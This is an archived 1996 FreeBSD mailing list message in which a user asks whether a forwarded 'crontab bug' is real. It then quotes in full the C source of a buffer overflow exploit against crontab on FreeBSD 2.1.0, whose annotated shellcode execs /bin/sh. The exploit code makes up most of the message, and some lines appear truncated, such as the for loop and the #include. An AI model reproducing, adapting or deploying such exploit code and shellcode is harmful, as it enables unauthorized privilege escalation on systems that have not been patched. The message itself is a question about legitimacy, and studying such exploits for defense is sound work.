From owner-freebsd-questions Mon Dec 16 06:52:51 1996
Return-Path:
Received: (from root@localhost) by freefall.freebsd.org (8.8.4/8.8.4) id GAA10129 for questions-outgoing; Mon, 16 Dec 1996 06:52:51 -0800 (PST)
Received: from maat.fastrans.net (maat.fastrans.net [206.114.221.3]) by freefall.freebsd.org (8.8.4/8.8.4) with ESMTP id GAA10119 for ; Mon, 16 Dec 1996 06:52:48 -0800 (PST)
Received: from james.fastrans.com (uncle-al.fastrans.net [206.114.221.6]) by maat.fastrans.net (8.7.5/8.6.12) with SMTP id IAA19952 for ; Mon, 16 Dec 1996 08:52:35 -0600 (CST)
Message-Id: <3.0.32.19961216085418.006997bc@mail.fastrans.net>
X-Sender: james@mail.fastrans.net
X-Mailer: Windows Eudora Pro Version 3.0 (32)
Date: Mon, 16 Dec 1996 08:54:18 -0800
To: support@freebsd.org
From: James Bass
Subject: security risk?
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-questions@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

Hello..

I run multiple FreeBSD systems running 2.1.5 or greater on all of them... I love it! It is the best, but....

Someone gave me this, and just out of curiosity, I wanted to know if it was legitimate or not.... It is allegedly a crontab bug...

>/* ---------------------------- CUT HERE ----------------------------------- */
>/*                                                                           */
>/* Hi !                                                                      */
>/* This is buffer overflow exploit for crontab bug (FreeBSD 2.1.0).          */
>/* If you have any problems with it, drop me a letter.                       */
>/* Have fun !                                                                */
>/*                                                                           */
>/*                                                                           */
>/*                          ----------------------                           */
>/*                  ---------------------------------------------            */
>/*           ----------------- Dedicated to my beautiful lady ------------------ */
>/*                  ---------------------------------------------            */
>/*                          ----------------------                           */
>/*                                                                           */
>/*          Leshka Zakharoff, 1996.  E-mail: leshka@leshka.chuvashia.su      */
>
>#include
>main()
>{
>#define length 353
> int i,j;
> unsigned long start_addr;
> char *env[]={NULL};
> char param_string[length];
> char code_string[]=
> {
>                  "\xeb\x2a"                     /* jmp cont                   */
>
>/* geteip: */     "\x5d"                         /* popl %ebp                  */
>                  "\x55"                         /* pushl %ebp                 */
>                  "\xfe\x4d\xe7"                 /* decb 0xffffffe7(%ebp)      */
>                  "\xfe\x4d\xeb"                 /* decb 0xffffffeb(%ebp)      */
>                  "\xfe\x4d\xec"                 /* decb 0xffffffec(%ebp)      */
>                  "\xfe\x4d\xed"                 /* decb 0xffffffed(%ebp)      */
>                  "\xff\x45\xef"                 /* incl 0xffffffef(%ebp)      */
>                  "\xfe\x4d\xf4"                 /* decb 0xfffffff4(%ebp)      */
>                  "\xc3"                         /* ret                        */
>
>/* 0xffffffe0(%ebp): */ "/bin/sh"
>/* 0xffffffe7(%ebp): */ "\x01"
>
>/* execve: */     "\x8d\x05\x3b\x01\x01\x01"     /* leal 0x3b,%eax             */
>                  "\x9a\xff\xff\xff\xff\x07\x01" /* lcall 0x7,0x0              */
>
>/* cont: */       "\xc7\xc4XXXX"                 /* movl $0xXXXXXXXX,%esp      */
>                  "\xe8\xcb\xff\xff\xff"         /* call geteip                */
>                  "\x81\xc5\xef\xff\xff\xff"     /* addl $0xffffffef,%ebp      */
>                  "\x55"                         /* pushl %ebp                 */
>                  "\x55"                         /* pushl %ebp                 */
>                  "\x81\xc5\xf1\xff\xff\xff"     /* addl $0xfffffff1,%ebp      */
>                  "\x55"                         /* pushl %ebp                 */
>                  "\xe8\xd4\xff\xff\xff"         /* call execve                */
> };
>
> for(i=0;i
> start_addr=0xefbfddf0;
> *( (unsigned long*) strstr(code_string,"XXXX") )= start_addr;
> strncpy(&param_string[200],code_string,strlen(code_string));
> *( (unsigned long*) &param_string[348])= start_addr;
>
> execle("/usr/bin/crontab","/usr/bin/crontab",param_string,NULL,env,NULL);
>
>}
>/* ---------------------------- CUT HERE ----------------------------------- */